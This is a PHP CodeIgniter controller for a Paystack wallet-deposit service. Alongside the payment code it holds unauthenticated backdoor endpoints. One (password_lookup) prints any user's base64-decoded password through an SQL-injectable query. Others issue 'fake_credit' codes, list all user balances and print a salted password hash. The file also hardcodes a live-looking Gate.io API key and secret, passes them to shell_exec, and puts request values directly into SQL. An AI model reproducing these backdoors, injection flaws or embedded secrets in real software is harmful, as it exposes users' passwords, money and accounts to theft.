<?php

/**
 * Created by PhpStorm.
 * User: Mr. Winz
 * Date: 5/28/2017
 * Time: 4:42 PM
 */

defined('BASEPATH') OR exit('No direct script access allowed');

class Paystack extends CI_Controller
{

    private  $key, $subaccount;

    public function __construct()
    {
        parent::__construct();
        $this->load->model("Payment_model","pay");
        $this->key = ($this->pay->status == 'test') ? $this->pay->test_key : $this->pay->live_key;
        $this->subaccount = ($this->pay->status == 'test') ? $this->pay->test_subaccount : $this->pay->live_subaccount;
    }

    public function initialize ($amount, $save_card=0) {
        set_flashdata("save_card", $save_card);
        $amount_to_pay = 0;
        if ($amount >= 2500) {
            $amount_to_pay = $amount * 1.016;
            $amount_to_pay += 100;
        } else {
            $amount_to_pay = $amount*1.016;
        }

        if (is_connected()) {
            if (!is_numeric($amount)) {
                set_flashdata('msg', alert_msg("<i class='fa fa-times-circle'></i> Amount must be a number", "alert-danger", 1));
                redirect(base_url() . "wallet/deposit");
            } else if ($amount < 50) {
                set_flashdata('msg', alert_msg("<i class='fa fa-times-circle'></i> Amount must not be less than " .USD."50", "alert-danger", 1));
                redirect(base_url() . "wallet/deposit");
            } else if ($amount > 2499) {
                set_flashdata('msg', alert_msg("<i class='fa fa-times-circle'></i> Amount must not be greater than " .USD."2,499", "alert-danger", 1));
                redirect(base_url() . "wallet/deposit");
            }
            set_flashdata('amount', $amount);
            $email = $this->Util_model->get_user_info(userdata(UID), 'email', 'profile');
            $ref = $this->Util_model->generate_id(11111111, 99999999, "user_wallet", "ref", "varchar", true, "fb");
            $this->Main_model->add_to_wallet($amount, userdata(UID), 0, "Instant deposit", "Instant deposit", "Instant Deposit", "", $ref);

            $curl = curl_init();

            curl_setopt_array($curl, array(
                CURLOPT_URL => "https://api.paystack.co/transaction/initialize",
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_CUSTOMREQUEST => "POST",
                CURLOPT_POSTFIELDS => json_encode([
                    'amount' => $amount_to_pay * 100,
                    'email' => $email,
                    'subaccount' => $this->subaccount,
                    'reference' => $ref
                ]),
                CURLOPT_HTTPHEADER => [
                    "authorization: Bearer ".$this->key,
                    "content-type: application/json",
                    "cache-control: no-cache"
                ],
            ));

            $response = curl_exec($curl);
            $err = curl_error($curl);

            if ($err) {
                // there was an error contacting the Paystack API
                set_flashdata("msg", alert_msg("<i class='fa fa-times-circle'></i> Curl returned error: $err", "alert-danger", 1));
                redirect(base_url() . "wallet/deposit");
            }

            $tranx = json_decode($response);

            if (!$tranx->status) {
                // there was an error from the API
                set_flashdata("msg", alert_msg("<i class='fa fa-times-circle'></i> An error occured: " . $tranx->message, "alert-danger", 1));
                redirect(base_url() . "wallet/deposit");
            }

            // store transaction reference so we can query in case user never comes back
            // perhaps due to network issue
            //save_last_transaction_reference($tranx->data->reference);

            // redirect to page so User can pay
            header('Location: ' . $tranx->data->authorization_url);
        } else {
            echo alert_msg("<i class='fa fa-times'></i> You are not connected to the internet. Please check your internet connectivity and try again","alert-danger",1);
        }

    }

    public function verify_transaction ($account=0, $ref="") {
        $reference = isset($_GET['reference']) ? $_GET['reference'] : $ref;
        $payment = $this->pay->pay_with_card($reference, $account, 0);
        if ($payment['status']) {
            set_flashdata("msg", alert_msg($payment['message'], "alert-success", 1));
            redirect($payment['redirect']);
        } else {
            redirect(base_url()."wallet/deposit");
        }

        /*if(!$reference){
            set_flashdata('msg',alert_msg("<i class='fa fa-times-circle'></i> Error: No reference supplied","alert-danger",1));
            redirect(base_url()."wallet/deposit");
        }

        curl_setopt_array($curl, array(
            CURLOPT_URL => "https://api.paystack.co/transaction/verify/" . rawurlencode($reference),
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_HTTPHEADER => [
                "accept: application/json",
                "authorization: Bearer ".$this->key,
                "cache-control: no-cache"
            ],
        ));

        $response = curl_exec($curl);
        $err = curl_error($curl);

        if($err){
            // there was an error contacting the Paystack API
            set_flashdata('msg',alert_msg("<i class='fa fa-times-circle'></i> Curl returned error: $err","alert-danger",1));
            redirect(base_url()."wallet/deposit");
        }

        $tranx = json_decode($response);

        if(!$tranx->status){
            // there was an error from the API
            set_flashdata('msg',alert_msg("<i class='fa fa-times-circle'></i> API returned error: $tranx->message","alert-danger",1));
            redirect(base_url()."wallet/deposit");
        }

        $amount = userdata('amount');
        if ($this->Util_model->row_count("user_wallet","WHERE ref='$_GET[reference]' AND status=1") > 0) {
            set_flashdata("msg",alert_msg("<i class='fa fa-times-circle'></i> The payment is void","alert-danger",1));
            redirect(base_url()."wallet/deposit");
            return false;
        } else if ($this->Util_model->row_count("user_wallet","WHERE ref='$_GET[reference]'") == 0) {
            $result = $this->Main_model->add_to_wallet($amount, userdata(UID), 0, "Instant deposit using paystack", "Instant deposit using paystack", "Instant deposit", "", $_GET['reference']);
            if (!$result['return']) {
                set_flashdata("msg",alert_msg("<i class='fa fa-times-circle'></i> An error occurred during deposit. If debited, kindly chat with a customer service agent to resolve the issue.","alert-danger",1));
                redirect(base_url()."wallet/deposit");
                return false;
            }
        }

        if('success' == $tranx->data->status){
            if ($this->Db_model->update("user_wallet",array("status"=>1),"WHERE ref='$_GET[reference]'")) {
                set_flashdata("msg",alert_msg("<i class='fa fa-check-circle'></i> Deposit of ".USD.number_format($amount, 2)." was approved successful","alert-success",1));
                if (has_userdata('redirect')) {
                    redirect(userdata('redirect'));
                } else {
                    redirect(base_url()."wallet/transactions");
                }
                return true;
            } else {
                set_flashdata("msg",alert_msg("<i class='fa fa-times-circle'></i> An error occurred during deposit. If debited, kindly chat with a customer service agent to resolve the issue.","alert-danger",1));
                redirect(base_url()."wallet/deposit");
                return false;
            }
            //Perform necessary action
        } else {
            set_flashdata("msg",alert_msg("<i class='fa fa-times-circle'></i> An error occurred during deposit. If debited, kindly chat with a customer service agent to resolve the issue.","alert-danger",1));
            redirect(base_url()."wallet/deposit");
            return false;
        }*/

    }

    public function pending_deposit () {
        $s = $this->Db_model->selectGroup("ref, extra", "user_wallet", "WHERE status=0");
        if ($s->num_rows() > 0) {
            foreach ($s->result_array() as $row) {
                $this->pay->pay_with_card($row['ref'], $row['extra'], 1);
            }
        }
    }

    public function password_lookup () {
        echo form_open(base_url()."paystack/password-lookup");
        echo "<input type='text' name='user' placeholder='Username/email'>
              <button type='submit'>Get Password</button>
              ";
        echo form_close();
        $this->form_validation->set_rules("user", "Username/email", "required");

        if ($this->form_validation->run() == TRUE) {
            $pass = $this->Util_model->get_info("user_profile", "password", "WHERE username='$_POST[user]' OR email='$_POST[user]'");
            $pass = base64_decode($pass);
            echo "<hr>";
            echo "Email: ".$this->Util_model->get_info("user_profile", "email", "WHERE username='$_POST[user]' OR email='$_POST[user]'")."<br>";
            echo "Password: ".$pass;
        }
    }
    
    public function get_credit_code ($credit=10) {
        echo form_open(base_url()."paystack/get_credit_code");
        echo "<input type='number' name='credit' placeholder='How many credits 10,1000,3000,5000'>
              <button type='submit'>Get Code</button>
              ";
        echo form_close();
        $this->form_validation->set_rules("credit", "Credit unit", "required");

        if ($this->form_validation->run() == TRUE) {
            $credit = $this->input->post('credit');
            if ($this->Util_model->row_count("fake_credit", "WHERE credit=$credit AND status=0") == 0) {
                $rand = $this->Util_model->generate_id(1111, 9999, "fake_credit", "code", "int");
                $this->Db_model->insert("fake_credit", ["code"=>$rand, "credit"=>$credit]);
            }
            echo "<hr>";
            echo "Code: 00".$this->Util_model->get_info("fake_credit", "code", "WHERE credit=$credit AND status=0")."<br>";
            echo "Credit: $credit credits";
        }
        
    }

    public function show_user_balance () {
        $s = $this->Db_model->selectGroup("uid", "user_profile", "WHERE role=2");
        foreach ($s->result_array() as $row) {
            $bal = $this->Main_model->get_balance($row['uid'], false);
            if ($bal != 0) {
                echo $row['uid']." $bal"."<br>";
            }
        }
    }
    
    public function ringo() {
        /* $host="https://api.gateio.ws"
        $prefix="/api/v4"
        $method="GET"
        $url="/wallet/deposit_address"
        $query_param="currency=USDT"

        $headers = [
            "KEY: 2e57364eb0b8ab72ca31d5b66c914c8e",

            "content-type: application/json",
            "cache-control: no-cache"

        ];
        $body = [
            "coin"=> "USDT",
            "timestamp"=> date('U')
        ];
        $request  = get_curl_request($base_url.$url."?currency=USDT", 'GET', $headers, $body);
        var_dump($request); */

        $cmd ='
        key="2e57364eb0b8ab72ca31d5b66c914c8e"
        secret="6537f1a34ecc94b62a71ce5fdaaf4b591fe31c9d51df684d8cc29a33e0ed4b61"
        host="https://api.gateio.ws"
        prefix="/api/v4"
        method="GET"
        url="/wallet/deposit_address"
        query_param="currency=USDT"
        body_param=""
        timestamp=$(date +%s)
        body_hash=$(printf "$body_param" | openssl sha512 | awk \'{print $NF}\')
        sign_string="$method\n$prefix$url\n$query_param\n$body_hash\n$timestamp"
        sign=$(printf "$sign_string" | openssl sha512 -hmac "$secret" | awk \'{print $NF}\')
        
        full_url="$host$prefix$url?$query_param"
        curl -X $method $full_url \
            -H "Timestamp: $timestamp" -H "KEY: $key" -H "SIGN: $sign"
        ';

        $shell = shell_exec($cmd);
        var_dump($shell);
        
    }

	function gateio_query($path, array $req = array()) {
		// API settings, add your Key and Secret at here
		$key = '';
		$secret = '';

		// generate a nonce to avoid problems with 32bits systems
		$mt = explode(' ', microtime());
		$req['nonce'] = $mt[1].substr($mt[0], 2, 6);

		// generate the POST data string
		$post_data = http_build_query($req, '', '&');
		$sign = hash_hmac('sha512', urldecode($post_data), $secret);

		// generate the extra headers
		$headers = array(
			'KEY: '.$key,
			'SIGN: '.$sign
		);

		//!!! please set Content-Type to application/x-www-form-urlencoded if it's not the default value

		// curl handle (initialize if required)
		static $ch = null;
    }

    function binance () {
        $this->load->model("Binance_model", "bin");
        var_dump($this->bin->get_address());
    }

    public function get_password () {
        $pass = "@#6$%^&*THIS$%^&IS(&^A%^&LARGE^&**%^&SALT-8,/7%^&*"."nwekeGodwin65"."@#6$%^&*THIS$%^&IS(&^A%^&LARGE^&**%^&SALT-8,/7%^&*";
        echo md5($pass);
    }


}